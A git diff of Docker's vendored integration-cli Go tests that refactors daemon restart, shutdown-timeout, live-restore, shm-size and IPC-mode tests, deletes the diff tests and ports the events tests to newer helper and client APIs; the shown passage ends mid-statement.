+ s.d.Restart(c, "--userland-proxy-path", dockerProxyPath) out, err = s.d.Cmd("run", "-p", "5000:5000", "busybox:latest", "true") c.Assert(err, checker.IsNil, check.Commentf(out)) // not exist - c.Assert(s.d.Restart("--userland-proxy-path", "/does/not/exist"), checker.IsNil) + s.d.Restart(c, "--userland-proxy-path", "/does/not/exist") out, err = s.d.Cmd("run", "-p", "5000:5000", "busybox:latest", "true") c.Assert(err, checker.NotNil, check.Commentf(out)) c.Assert(out, checker.Contains, "driver failed programming external connectivity on endpoint") @@ -2878,21 +2701,21 @@ func (s *DockerDaemonSuite) TestDaemonWithUserlandProxyPath(c *check.C) { // Test case for #22471 func (s *DockerDaemonSuite) TestDaemonShutdownTimeout(c *check.C) { testRequires(c, SameHostDaemon) - - c.Assert(s.d.StartWithBusybox("--shutdown-timeout=3"), check.IsNil) + s.d.StartWithBusybox(c, "--shutdown-timeout=3") _, err := s.d.Cmd("run", "-d", "busybox", "top") c.Assert(err, check.IsNil) - syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGINT) + c.Assert(s.d.Signal(unix.SIGINT), checker.IsNil) select { - case <-s.d.wait: + case <-s.d.Wait: case <-time.After(5 * time.Second): } - expectedMessage := `level=debug msg="start clean shutdown of all containers with a 3 seconds timeout..."` - content, _ := ioutil.ReadFile(s.d.logFile.Name()) + expectedMessage := `level=debug msg="daemon configured with a 3 seconds minimum shutdown timeout"` + content, err := s.d.ReadLogFile() + c.Assert(err, checker.IsNil) c.Assert(string(content), checker.Contains, expectedMessage) } @@ -2909,7 +2732,7 @@ func (s *DockerDaemonSuite) TestDaemonShutdownTimeoutWithConfigFile(c *check.C) daemonConfig := `{ "shutdown-timeout" : 8 }` fmt.Fprintf(configFile, "%s", daemonConfig) configFile.Close() - c.Assert(s.d.Start(fmt.Sprintf("--config-file=%s", configFilePath)), check.IsNil) + s.d.Start(c, fmt.Sprintf("--config-file=%s", configFilePath)) configFile, err = os.Create(configFilePath) c.Assert(err, checker.IsNil) @@ -2917,38 +2740,43 @@ func (s *DockerDaemonSuite) TestDaemonShutdownTimeoutWithConfigFile(c *check.C) fmt.Fprintf(configFile, "%s", daemonConfig) configFile.Close() - syscall.Kill(s.d.cmd.Process.Pid, syscall.SIGHUP) + c.Assert(s.d.Signal(unix.SIGHUP), checker.IsNil) select { - case <-s.d.wait: + case <-s.d.Wait: case <-time.After(3 * time.Second): } expectedMessage := `level=debug msg="Reset Shutdown Timeout: 5"` - content, _ := ioutil.ReadFile(s.d.logFile.Name()) + content, err := s.d.ReadLogFile() + c.Assert(err, checker.IsNil) c.Assert(string(content), checker.Contains, expectedMessage) } // Test case for 29342 func (s *DockerDaemonSuite) TestExecWithUserAfterLiveRestore(c *check.C) { testRequires(c, DaemonIsLinux) - s.d.StartWithBusybox("--live-restore") + s.d.StartWithBusybox(c, "--live-restore") - out, err := s.d.Cmd("run", "-d", "--name=top", "busybox", "sh", "-c", "addgroup -S test && adduser -S -G test test -D -s /bin/sh && top") + out, err := s.d.Cmd("run", "-d", "--name=top", "busybox", "sh", "-c", "addgroup -S test && adduser -S -G test test -D -s /bin/sh && touch /adduser_end && top") c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) - s.d.waitRun("top") + s.d.WaitRun("top") + + // Wait for shell command to be completed + _, err = s.d.Cmd("exec", "top", "sh", "-c", `for i in $(seq 1 5); do if [ -e /adduser_end ]; then rm -f /adduser_end && break; else sleep 1 && false; fi; done`) + c.Assert(err, check.IsNil, check.Commentf("Timeout waiting for shell command to be completed")) out1, err := s.d.Cmd("exec", "-u", "test", "top", "id") // uid=100(test) gid=101(test) groups=101(test) c.Assert(err, check.IsNil, check.Commentf("Output: %s", out1)) // restart daemon. - s.d.Restart("--live-restore") + s.d.Restart(c, "--live-restore") out2, err := s.d.Cmd("exec", "-u", "test", "top", "id") c.Assert(err, check.IsNil, check.Commentf("Output: %s", out2)) - c.Assert(out1, check.Equals, out2, check.Commentf("Output: before restart '%s', after restart '%s'", out1, out2)) + c.Assert(out2, check.Equals, out1, check.Commentf("Output: before restart '%s', after restart '%s'", out1, out2)) out, err = s.d.Cmd("stop", "top") c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) @@ -2956,20 +2784,20 @@ func (s *DockerDaemonSuite) TestExecWithUserAfterLiveRestore(c *check.C) { func (s *DockerDaemonSuite) TestRemoveContainerAfterLiveRestore(c *check.C) { testRequires(c, DaemonIsLinux, overlayFSSupported, SameHostDaemon) - s.d.StartWithBusybox("--live-restore", "--storage-driver", "overlay") + s.d.StartWithBusybox(c, "--live-restore", "--storage-driver", "overlay") out, err := s.d.Cmd("run", "-d", "--name=top", "busybox", "top") c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) - s.d.waitRun("top") + s.d.WaitRun("top") // restart daemon. - s.d.Restart("--live-restore", "--storage-driver", "overlay") + s.d.Restart(c, "--live-restore", "--storage-driver", "overlay") out, err = s.d.Cmd("stop", "top") c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) // test if the rootfs mountpoint still exist - mountpoint, err := s.d.inspectFilter("top", ".GraphDriver.Data.MergedDir") + mountpoint, err := s.d.InspectField("top", ".GraphDriver.Data.MergedDir") c.Assert(err, check.IsNil) f, err := os.Open("/proc/self/mountinfo") c.Assert(err, check.IsNil) @@ -2984,5 +2812,320 @@ func (s *DockerDaemonSuite) TestRemoveContainerAfterLiveRestore(c *check.C) { out, err = s.d.Cmd("rm", "top") c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) +} + +// #29598 +func (s *DockerDaemonSuite) TestRestartPolicyWithLiveRestore(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon) + s.d.StartWithBusybox(c, "--live-restore") + + out, err := s.d.Cmd("run", "-d", "--restart", "always", "busybox", "top") + c.Assert(err, check.IsNil, check.Commentf("output: %s", out)) + id := strings.TrimSpace(out) + + type state struct { + Running bool + StartedAt time.Time + } + out, err = s.d.Cmd("inspect", "-f", "{{json .State}}", id) + c.Assert(err, checker.IsNil, check.Commentf("output: %s", out)) + + var origState state + err = json.Unmarshal([]byte(strings.TrimSpace(out)), &origState) + c.Assert(err, checker.IsNil) + + s.d.Restart(c, "--live-restore") + + pid, err := s.d.Cmd("inspect", "-f", "{{.State.Pid}}", id) + c.Assert(err, check.IsNil) + pidint, err := strconv.Atoi(strings.TrimSpace(pid)) + c.Assert(err, check.IsNil) + c.Assert(pidint, checker.GreaterThan, 0) + c.Assert(unix.Kill(pidint, unix.SIGKILL), check.IsNil) + + ticker := time.NewTicker(50 * time.Millisecond) + timeout := time.After(10 * time.Second) + + for range ticker.C { + select { + case <-timeout: + c.Fatal("timeout waiting for container restart") + default: + } + + out, err := s.d.Cmd("inspect", "-f", "{{json .State}}", id) + c.Assert(err, checker.IsNil, check.Commentf("output: %s", out)) + + var newState state + err = json.Unmarshal([]byte(strings.TrimSpace(out)), &newState) + c.Assert(err, checker.IsNil) + + if !newState.Running { + continue + } + if newState.StartedAt.After(origState.StartedAt) { + break + } + } + + out, err = s.d.Cmd("stop", id) + c.Assert(err, check.IsNil, check.Commentf("output: %s", out)) +} + +func (s *DockerDaemonSuite) TestShmSize(c *check.C) { + testRequires(c, DaemonIsLinux) + + size := 67108864 * 2 + pattern := regexp.MustCompile(fmt.Sprintf("shm on /dev/shm type tmpfs(.*)size=%dk", size/1024)) + + s.d.StartWithBusybox(c, "--default-shm-size", fmt.Sprintf("%v", size)) + + name := "shm1" + out, err := s.d.Cmd("run", "--name", name, "busybox", "mount") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + c.Assert(pattern.MatchString(out), checker.True) + out, err = s.d.Cmd("inspect", "--format", "{{.HostConfig.ShmSize}}", name) + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + c.Assert(strings.TrimSpace(out), check.Equals, fmt.Sprintf("%v", size)) +} + +func (s *DockerDaemonSuite) TestShmSizeReload(c *check.C) { + testRequires(c, DaemonIsLinux) + + configPath, err := ioutil.TempDir("", "test-daemon-shm-size-reload-config") + c.Assert(err, checker.IsNil, check.Commentf("could not create temp file for config reload")) + defer os.RemoveAll(configPath) // clean up + configFile := filepath.Join(configPath, "config.json") + + size := 67108864 * 2 + configData := []byte(fmt.Sprintf(`{"default-shm-size": "%dM"}`, size/1024/1024)) + c.Assert(ioutil.WriteFile(configFile, configData, 0666), checker.IsNil, check.Commentf("could not write temp file for config reload")) + pattern := regexp.MustCompile(fmt.Sprintf("shm on /dev/shm type tmpfs(.*)size=%dk", size/1024)) + + s.d.StartWithBusybox(c, "--config-file", configFile) + + name := "shm1" + out, err := s.d.Cmd("run", "--name", name, "busybox", "mount") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + c.Assert(pattern.MatchString(out), checker.True) + out, err = s.d.Cmd("inspect", "--format", "{{.HostConfig.ShmSize}}", name) + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + c.Assert(strings.TrimSpace(out), check.Equals, fmt.Sprintf("%v", size)) + + size = 67108864 * 3 + configData = []byte(fmt.Sprintf(`{"default-shm-size": "%dM"}`, size/1024/1024)) + c.Assert(ioutil.WriteFile(configFile, configData, 0666), checker.IsNil, check.Commentf("could not write temp file for config reload")) + pattern = regexp.MustCompile(fmt.Sprintf("shm on /dev/shm type tmpfs(.*)size=%dk", size/1024)) + + err = s.d.ReloadConfig() + c.Assert(err, checker.IsNil, check.Commentf("error reloading daemon config")) + + name = "shm2" + out, err = s.d.Cmd("run", "--name", name, "busybox", "mount") + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + c.Assert(pattern.MatchString(out), checker.True) + out, err = s.d.Cmd("inspect", "--format", "{{.HostConfig.ShmSize}}", name) + c.Assert(err, check.IsNil, check.Commentf("Output: %s", out)) + c.Assert(strings.TrimSpace(out), check.Equals, fmt.Sprintf("%v", size)) +} + +// this is used to test both "private" and "shareable" daemon default ipc modes +func testDaemonIpcPrivateShareable(d *daemon.Daemon, c *check.C, mustExist bool) { + name := "test-ipcmode" + _, err := d.Cmd("run", "-d", "--name", name, "busybox", "top") + c.Assert(err, checker.IsNil) + + // get major:minor pair for /dev/shm from container's /proc/self/mountinfo + cmd := "awk '($5 == \"/dev/shm\") {printf $3}' /proc/self/mountinfo" + mm, err := d.Cmd("exec", "-i", name, "sh", "-c", cmd) + c.Assert(err, checker.IsNil) + c.Assert(mm, checker.Matches, "^[0-9]+:[0-9]+$") + exists, err := testIpcCheckDevExists(mm) + c.Assert(err, checker.IsNil) + c.Logf("[testDaemonIpcPrivateShareable] ipcdev: %v, exists: %v, mustExist: %v\n", mm, exists, mustExist) + c.Assert(exists, checker.Equals, mustExist) +} + +// TestDaemonIpcModeShareable checks that --default-ipc-mode shareable works as intended. +func (s *DockerDaemonSuite) TestDaemonIpcModeShareable(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon) + + s.d.StartWithBusybox(c, "--default-ipc-mode", "shareable") + testDaemonIpcPrivateShareable(s.d, c, true) +} + +// TestDaemonIpcModePrivate checks that --default-ipc-mode private works as intended. +func (s *DockerDaemonSuite) TestDaemonIpcModePrivate(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon) + + s.d.StartWithBusybox(c, "--default-ipc-mode", "private") + testDaemonIpcPrivateShareable(s.d, c, false) +} + +// used to check if an IpcMode given in config works as intended +func testDaemonIpcFromConfig(s *DockerDaemonSuite, c *check.C, mode string, mustExist bool) { + f, err := ioutil.TempFile("", "test-daemon-ipc-config") + c.Assert(err, checker.IsNil) + defer os.Remove(f.Name()) + + config := `{"default-ipc-mode": "` + mode + `"}` + _, err = f.WriteString(config) + c.Assert(f.Close(), checker.IsNil) + c.Assert(err, checker.IsNil) + + s.d.StartWithBusybox(c, "--config-file", f.Name()) + testDaemonIpcPrivateShareable(s.d, c, mustExist) +} + +// TestDaemonIpcModePrivateFromConfig checks that "default-ipc-mode: private" config works as intended. +func (s *DockerDaemonSuite) TestDaemonIpcModePrivateFromConfig(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon) + testDaemonIpcFromConfig(s, c, "private", false) +} + +// TestDaemonIpcModeShareableFromConfig checks that "default-ipc-mode: shareable" config works as intended. +func (s *DockerDaemonSuite) TestDaemonIpcModeShareableFromConfig(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon) + testDaemonIpcFromConfig(s, c, "shareable", true) +} + +func testDaemonStartIpcMode(c *check.C, from, mode string, valid bool) { + d := daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution)) + c.Logf("Checking IpcMode %s set from %s\n", mode, from) + var serr error + switch from { + case "config": + f, err := ioutil.TempFile("", "test-daemon-ipc-config") + c.Assert(err, checker.IsNil) + defer os.Remove(f.Name()) + config := `{"default-ipc-mode": "` + mode + `"}` + _, err = f.WriteString(config) + c.Assert(f.Close(), checker.IsNil) + c.Assert(err, checker.IsNil) + + serr = d.StartWithError("--config-file", f.Name()) + case "cli": + serr = d.StartWithError("--default-ipc-mode", mode) + default: + c.Fatalf("testDaemonStartIpcMode: invalid 'from' argument") + } + if serr == nil { + d.Stop(c) + } + + if valid { + c.Assert(serr, check.IsNil) + } else { + c.Assert(serr, check.NotNil) + icmd.RunCommand("grep", "-E", "IPC .* is (invalid|not supported)", d.LogFileName()).Assert(c, icmd.Success) + } +} + +// TestDaemonStartWithIpcModes checks that daemon starts fine given correct +// arguments for default IPC mode, and bails out with incorrect ones. +// Both CLI option (--default-ipc-mode) and config parameter are tested. +func (s *DockerDaemonSuite) TestDaemonStartWithIpcModes(c *check.C) { + testRequires(c, DaemonIsLinux, SameHostDaemon) + + ipcModes := []struct { + mode string + valid bool + }{ + {"private", true}, + {"shareable", true}, + + {"host", false}, + {"container:123", false}, + {"nosuchmode", false}, + } + + for _, from := range []string{"config", "cli"} { + for _, m := range ipcModes { + testDaemonStartIpcMode(c, from, m.mode, m.valid) + } + } +} + +// TestDaemonRestartIpcMode makes sure a container keeps its ipc mode +// (derived from daemon default) even after the daemon is restarted +// with a different default ipc mode. +func (s *DockerDaemonSuite) TestDaemonRestartIpcMode(c *check.C) { + f, err := ioutil.TempFile("", "test-daemon-ipc-config-restart") + c.Assert(err, checker.IsNil) + file := f.Name() + defer os.Remove(file) + c.Assert(f.Close(), checker.IsNil) + + config := []byte(`{"default-ipc-mode": "private"}`) + c.Assert(ioutil.WriteFile(file, config, 0644), checker.IsNil) + s.d.StartWithBusybox(c, "--config-file", file) + + // check the container is created with private ipc mode as per daemon default + name := "ipc1" + _, err = s.d.Cmd("run", "-d", "--name", name, "--restart=always", "busybox", "top") + c.Assert(err, checker.IsNil) + m, err := s.d.InspectField(name, ".HostConfig.IpcMode") + c.Assert(err, check.IsNil) + c.Assert(m, checker.Equals, "private") + + // restart the daemon with shareable default ipc mode + config = []byte(`{"default-ipc-mode": "shareable"}`) + c.Assert(ioutil.WriteFile(file, config, 0644), checker.IsNil) + s.d.Restart(c, "--config-file", file) + + // check the container is still having private ipc mode + m, err = s.d.InspectField(name, ".HostConfig.IpcMode") + c.Assert(err, check.IsNil) + c.Assert(m, checker.Equals, "private") + + // check a new container is created with shareable ipc mode as per new daemon default + name = "ipc2" + _, err = s.d.Cmd("run", "-d", "--name", name, "busybox", "top") + c.Assert(err, checker.IsNil) + m, err = s.d.InspectField(name, ".HostConfig.IpcMode") + c.Assert(err, check.IsNil) + c.Assert(m, checker.Equals, "shareable") +} + +// TestFailedPluginRemove makes sure that a failed plugin remove does not block +// the daemon from starting +func (s *DockerDaemonSuite) TestFailedPluginRemove(c *check.C) { + testRequires(c, DaemonIsLinux, IsAmd64, SameHostDaemon) + d := daemon.New(c, dockerBinary, dockerdBinary) + d.Start(c) + cli, err := client.NewClient(d.Sock(), api.DefaultVersion, nil, nil) + c.Assert(err, checker.IsNil) + + ctx, cancel := context.WithTimeout(context.Background(), 300*time.Second) + defer cancel() + + name := "test-plugin-rm-fail" + out, err := cli.PluginInstall(ctx, name, types.PluginInstallOptions{ + Disabled: true, + AcceptAllPermissions: true, + RemoteRef: "cpuguy83/docker-logdriver-test", + }) + c.Assert(err, checker.IsNil) + defer out.Close() + io.Copy(ioutil.Discard, out) + + ctx, cancel = context.WithTimeout(context.Background(), 30*time.Second) + defer cancel() + p, _, err := cli.PluginInspectWithRaw(ctx, name) + c.Assert(err, checker.IsNil) + + // simulate a bad/partial removal by removing the plugin config. + configPath := filepath.Join(d.Root, "plugins", p.ID, "config.json") + c.Assert(os.Remove(configPath), checker.IsNil) + + d.Restart(c) + ctx, cancel = context.WithTimeout(context.Background(), 30*time.Second) + defer cancel() + _, err = cli.Ping(ctx) + c.Assert(err, checker.IsNil) + + _, _, err = cli.PluginInspectWithRaw(ctx, name) + // plugin should be gone since the config.json is gone + c.Assert(err, checker.NotNil) } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_diff_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_diff_test.go deleted file mode 100644 index 08cf6e1caa..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_diff_test.go +++ /dev/null @@ -1,98 +0,0 @@ -package main - -import ( - "strings" - "time" - - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -// ensure that an added file shows up in docker diff -func (s *DockerSuite) TestDiffFilenameShownInOutput(c *check.C) { - containerCmd := `mkdir /foo; echo xyzzy > /foo/bar` - out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", containerCmd) - - // Wait for it to exit as cannot diff a running container on Windows, and - // it will take a few seconds to exit. Also there's no way in Windows to - // differentiate between an Add or a Modify, and all files are under - // a "Files/" prefix. - containerID := strings.TrimSpace(out) - lookingFor := "A /foo/bar" - if daemonPlatform == "windows" { - err := waitExited(containerID, 60*time.Second) - c.Assert(err, check.IsNil) - lookingFor = "C Files/foo/bar" - } - - cleanCID := strings.TrimSpace(out) - out, _ = dockerCmd(c, "diff", cleanCID) - - found := false - for _, line := range strings.Split(out, "\n") { - if strings.Contains(line, lookingFor) { - found = true - break - } - } - c.Assert(found, checker.True) -} - -// test to ensure GH #3840 doesn't occur any more -func (s *DockerSuite) TestDiffEnsureInitLayerFilesAreIgnored(c *check.C) { - testRequires(c, DaemonIsLinux) - // this is a list of files which shouldn't show up in `docker diff` - initLayerFiles := []string{"/etc/resolv.conf", "/etc/hostname", "/etc/hosts", "/.dockerenv"} - containerCount := 5 - - // we might not run into this problem from the first run, so start a few containers - for i := 0; i < containerCount; i++ { - containerCmd := `echo foo > /root/bar` - out, _ := dockerCmd(c, "run", "-d", "busybox", "sh", "-c", containerCmd) - - cleanCID := strings.TrimSpace(out) - out, _ = dockerCmd(c, "diff", cleanCID) - - for _, filename := range initLayerFiles { - c.Assert(out, checker.Not(checker.Contains), filename) - } - } -} - -func (s *DockerSuite) TestDiffEnsureDefaultDevs(c *check.C) { - testRequires(c, DaemonIsLinux) - out, _ := dockerCmd(c, "run", "-d", "busybox", "sleep", "0") - - cleanCID := strings.TrimSpace(out) - out, _ = dockerCmd(c, "diff", cleanCID) - - expected := map[string]bool{ - "C /dev": true, - "A /dev/full": true, // busybox - "C /dev/ptmx": true, // libcontainer - "A /dev/mqueue": true, - "A /dev/kmsg": true, - "A /dev/fd": true, - "A /dev/ptmx": true, - "A /dev/null": true, - "A /dev/random": true, - "A /dev/stdout": true, - "A /dev/stderr": true, - "A /dev/tty1": true, - "A /dev/stdin": true, - "A /dev/tty": true, - "A /dev/urandom": true, - "A /dev/zero": true, - } - - for _, line := range strings.Split(out, "\n") { - c.Assert(line == "" || expected[line], checker.True, check.Commentf(line)) - } -} - -// https://github.com/docker/docker/pull/14381#discussion_r33859347 -func (s *DockerSuite) TestDiffEmptyArgClientError(c *check.C) { - out, _, err := dockerCmdWithError("diff", "") - c.Assert(err, checker.NotNil) - c.Assert(strings.TrimSpace(out), checker.Contains, "Container name cannot be empty") -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_events_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_events_test.go index 1fbfc742de..db1e34020f 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_events_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_events_test.go @@ -2,21 +2,25 @@ package main import ( "bufio" + "context" "encoding/json" "fmt" "io" "io/ioutil" - "net/http" "os" "os/exec" "strings" "time" + "github.com/docker/docker/api/types" eventtypes "github.com/docker/docker/api/types/events" + "github.com/docker/docker/client" eventstestutils "github.com/docker/docker/daemon/events/testutils" - "github.com/docker/docker/pkg/integration/checker" - icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/cli/build" "github.com/go-check/check" + "gotest.tools/icmd" ) func (s *DockerSuite) TestEventsTimestampFormats(c *check.C) { @@ -32,7 +36,7 @@ func (s *DockerSuite) TestEventsTimestampFormats(c *check.C) { // List of available time formats to --since unixTs := func(t time.Time) string { return fmt.Sprintf("%v", t.Unix()) } rfc3339 := func(t time.Time) string { return t.Format(time.RFC3339) } - duration := func(t time.Time) string { return time.Now().Sub(t).String() } + duration := func(t time.Time) string { return time.Since(t).String() } // --since=$start must contain only the 'untag' event for _, f := range []func(time.Time) string{unixTs, rfc3339, duration} { @@ -65,7 +69,7 @@ func (s *DockerSuite) TestEventsUntag(c *check.C) { Command: []string{dockerBinary, "events", "--since=1"}, Timeout: time.Millisecond * 2500, }) - c.Assert(result, icmd.Matches, icmd.Expected{Timeout: true}) + result.Assert(c, icmd.Expected{Timeout: true}) events := strings.Split(result.Stdout(), "\n") nEvents := len(events) @@ -77,42 +81,6 @@ func (s *DockerSuite) TestEventsUntag(c *check.C) { } } -func (s *DockerSuite) TestEventsLimit(c *check.C) { - // Limit to 8 goroutines creating containers in order to prevent timeouts - // creating so many containers simultaneously on Windows - sem := make(chan bool, 8) - numContainers := 17 - errChan := make(chan error, numContainers) - - args := []string{"run", "--rm", "busybox", "true"} - for i := 0; i < numContainers; i++ { - sem <- true - go func() { - defer func() { <-sem }() - out, err := exec.Command(dockerBinary, args...).CombinedOutput() - if err != nil { - err = fmt.Errorf("%v: %s", err, string(out)) - } - errChan <- err - }() - } - - // Wait for all goroutines to finish - for i := 0; i < cap(sem); i++ { - sem <- true - } - close(errChan) - - for err := range errChan { - c.Assert(err, checker.IsNil, check.Commentf("%q failed with error", strings.Join(args, " "))) - } - - out, _ := dockerCmd(c, "events", "--since=0", "--until", daemonUnixTime(c)) - events := strings.Split(out, "\n") - nEvents := len(events) - 1 - c.Assert(nEvents, checker.Equals, 64, check.Commentf("events should be limited to 64, but received %d", nEvents)) -} - func (s *DockerSuite) TestEventsContainerEvents(c *check.C) { dockerCmd(c, "run", "--rm", "--name", "container-events-test", "busybox", "true") @@ -221,7 +189,7 @@ func (s *DockerSuite) TestEventsImageImport(c *check.C) { cleanedContainerID := strings.TrimSpace(out) since := daemonUnixTime(c) - out, _, err := runCommandPipelineWithOutput( + out, err := RunCommandPipelineWithOutput( exec.Command(dockerBinary, "export", cleanedContainerID), exec.Command(dockerBinary, "import", "-"), ) @@ -254,7 +222,7 @@ func (s *DockerSuite) TestEventsImageLoad(c *check.C) { dockerCmd(c, "load", "-i", "saveimg.tar") result := icmd.RunCommand("rm", "-rf", "saveimg.tar") - c.Assert(result, icmd.Matches, icmd.Success) + result.Assert(c, icmd.Success) out, _ = dockerCmd(c, "images", "-q", "--no-trunc", myImageName) imageID := strings.TrimSpace(out) @@ -377,11 +345,9 @@ func (s *DockerSuite) TestEventsFilterImageLabels(c *check.C) { label := "io.docker.testing=image" // Build a test image. - _, err := buildImage(name, fmt.Sprintf(` + buildImageSuccessfully(c, name, build.WithDockerfile(fmt.Sprintf(` FROM busybox:latest - LABEL %s`, label), true) - c.Assert(err, checker.IsNil, check.Commentf("Couldn't create image")) - + LABEL %s`, label))) dockerCmd(c, "tag", name, "labelfiltertest:tag1") dockerCmd(c, "tag", name, "labelfiltertest:tag2") dockerCmd(c, "tag", "busybox:latest", "labelfiltertest:tag3") @@ -445,25 +411,25 @@ func (s *DockerSuite) TestEventsCommit(c *check.C) { // Problematic on Windows as cannot commit a running container testRequires(c, DaemonIsLinux) - out, _ := runSleepingContainer(c) + out := runSleepingContainer(c) cID := strings.TrimSpace(out) - c.Assert(waitRun(cID), checker.IsNil) + cli.WaitRun(c, cID) - dockerCmd(c, "commit", "-m", "test", cID) - dockerCmd(c, "stop", cID) - c.Assert(waitExited(cID, 5*time.Second), checker.IsNil) + cli.DockerCmd(c, "commit", "-m", "test", cID) + cli.DockerCmd(c, "stop", cID) + cli.WaitExited(c, cID, 5*time.Second) until := daemonUnixTime(c) - out, _ = dockerCmd(c, "events", "-f", "container="+cID, "--until="+until) + out = cli.DockerCmd(c, "events", "-f", "container="+cID, "--until="+until).Combined() c.Assert(out, checker.Contains, "commit", check.Commentf("Missing 'commit' log event")) } func (s *DockerSuite) TestEventsCopy(c *check.C) { // Build a test image. - id, err := buildImage("cpimg", ` + buildImageSuccessfully(c, "cpimg", build.WithDockerfile(` FROM busybox - RUN echo HI > /file`, true) - c.Assert(err, checker.IsNil, check.Commentf("Couldn't create image")) + RUN echo HI > /file`)) + id := getIDByName(c, "cpimg") // Create an empty test file. tempFile, err := ioutil.TempFile("", "test-events-copy-") @@ -488,13 +454,19 @@ func (s *DockerSuite) TestEventsCopy(c *check.C) { } func (s *DockerSuite) TestEventsResize(c *check.C) { - out, _ := runSleepingContainer(c, "-d") + out := runSleepingContainer(c, "-d") cID := strings.TrimSpace(out) c.Assert(waitRun(cID), checker.IsNil) - endpoint := "/containers/" + cID + "/resize?h=80&w=24" - status, _, err := sockRequest("POST", endpoint, nil) - c.Assert(status, checker.Equals, http.StatusOK) + cli, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + options := types.ResizeOptions{ + Height: 80, + Width: 24, + } + err = cli.ContainerResize(context.Background(), cID, options) c.Assert(err, checker.IsNil) dockerCmd(c, "stop", cID) @@ -508,9 +480,9 @@ func (s *DockerSuite) TestEventsAttach(c *check.C) { // TODO Windows CI: Figure out why this test fails intermittently (TP5). testRequires(c, DaemonIsLinux) - out, _ := dockerCmd(c, "run", "-di", "busybox", "cat") + out := cli.DockerCmd(c, "run", "-di", "busybox", "cat").Combined() cID := strings.TrimSpace(out) - c.Assert(waitRun(cID), checker.IsNil) + cli.WaitRun(c, cID) cmd := exec.Command(dockerBinary, "attach", cID) stdin, err := cmd.StdinPipe() @@ -520,7 +492,10 @@ func (s *DockerSuite) TestEventsAttach(c *check.C) { c.Assert(err, checker.IsNil) defer stdout.Close() c.Assert(cmd.Start(), checker.IsNil) - defer cmd.Process.Kill() + defer func() { + cmd.Process.Kill() + cmd.Wait() + }() // Make sure we're done attaching by writing/reading some stuff _, err = stdin.Write([]byte("hello\n")) @@ -531,11 +506,11 @@ func (s *DockerSuite) TestEventsAttach(c *check.C) { c.Assert(stdin.Close(), checker.IsNil) - dockerCmd(c, "kill", cID) - c.Assert(waitExited(cID, 5*time.Second), checker.IsNil) + cli.DockerCmd(c, "kill", cID) + cli.WaitExited(c, cID, 5*time.Second) until := daemonUnixTime(c) - out, _ = dockerCmd(c, "events", "-f", "container="+cID, "--until="+until) + out = cli.DockerCmd(c, "events", "-f", "container="+cID, "--until="+until).Combined() c.Assert(out, checker.Contains, "attach", check.Commentf("Missing 'attach' log event")) } @@ -554,7 +529,7 @@ func (s *DockerSuite) TestEventsTop(c *check.C) { // Problematic on Windows as Windows does not support top testRequires(c, DaemonIsLinux) - out, _ := runSleepingContainer(c, "-d") + out := runSleepingContainer(c, "-d") cID := strings.TrimSpace(out) c.Assert(waitRun(cID), checker.IsNil) @@ -588,16 +563,16 @@ func (s *DockerRegistrySuite) TestEventsImageFilterPush(c *check.C) { } func (s *DockerSuite) TestEventsFilterType(c *check.C) { + // FIXME(vdemeester) fails on e2e run + testRequires(c, SameHostDaemon) since := daemonUnixTime(c) name := "labelfiltertest" label := "io.docker.testing=image" // Build a test image. - _, err := buildImage(name, fmt.Sprintf(` + buildImageSuccessfully(c, name, build.WithDockerfile(fmt.Sprintf(` FROM busybox:latest - LABEL %s`, label), true) - c.Assert(err, checker.IsNil, check.Commentf("Couldn't create image")) - + LABEL %s`, label))) dockerCmd(c, "tag", name, "labelfiltertest:tag1") dockerCmd(c, "tag", name, "labelfiltertest:tag2") dockerCmd(c, "tag", "busybox:latest", "labelfiltertest:tag3") @@ -628,7 +603,7 @@ func (s *DockerSuite) TestEventsFilterType(c *check.C) { events = strings.Split(strings.TrimSpace(out), "\n") // Events generated by the container that builds the image - c.Assert(events, checker.HasLen, 3, check.Commentf("Events == %s", events)) + c.Assert(events, checker.HasLen, 2, check.Commentf("Events == %s", events)) out, _ = dockerCmd( c, @@ -686,7 +661,7 @@ func (s *DockerSuite) TestEventsContainerRestart(c *check.C) { // wait until test2 is auto removed. waitTime := 10 * time.Second - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { // Windows takes longer... waitTime = 90 * time.Second } @@ -776,7 +751,7 @@ func (s *DockerSuite) TestEventsFormat(c *check.C) { func (s *DockerSuite) TestEventsFormatBadFunc(c *check.C) { // make sure it fails immediately, without receiving any event result := dockerCmdWithResult("events", "--format", "{{badFuncString .}}") - c.Assert(result, icmd.Matches, icmd.Expected{ + result.Assert(c, icmd.Expected{ Error: "exit status 64", ExitCode: 64, Err: "Error parsing format: template: :1: function \"badFuncString\" not defined", @@ -786,7 +761,7 @@ func (s *DockerSuite) TestEventsFormatBadFunc(c *check.C) { func (s *DockerSuite) TestEventsFormatBadField(c *check.C) { // make sure it fails immediately, without receiving any event result := 